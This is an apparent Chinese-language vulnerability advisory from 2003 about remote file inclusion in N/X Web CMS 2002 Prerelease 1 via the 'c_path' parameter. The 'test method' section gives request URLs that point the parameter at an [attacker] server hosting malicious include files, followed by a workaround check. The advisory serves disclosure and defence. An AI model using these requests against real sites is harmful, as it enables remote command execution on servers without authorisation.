发布日期：2003-01-02
更新日期：2003-01-07

受影响系统：

N/X N/X Web Content Management System 2002 Prerelease 1

描述：

---

BUGTRAQ  ID: 6500

N/X Web Content Management System是一款方便建立和维护站点的系统。

N/X Web CMS多个脚本对用户提交的参数数据缺少正确过滤，远程攻击者可以利用这个漏洞提恶意WEB请求而以WEB权限在系统上执行任意命令。

CMS包含的'nx/common/cds/menu.inc.php'和'nx/common/dbo/datasets.php'脚本对用户提交的'c_path'参数缺少正确检查，攻击者可以在自己控制的服务器上提供恶意文件，并提交指向恶意文件的路径作为'c_path'参数的请求，可导致以WEB进程权限在系统上执行任意命令。

<*来源：Frog Man （leseulfrog@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104152465911727&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Frog Man （leseulfrog@hotmail.com）提供了如下测试方法：

http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with :
http://[attacker]/common/lib/launch.inc.php


http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在受此漏洞影响的脚本中添加如下代码：

if (!file_exists($c_path."index.php")){ die("Path not found."); }

厂商补丁：

N/X
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://nxwcms.sourceforge.net/

浏览次数：2794
严重程度：0（网友投票）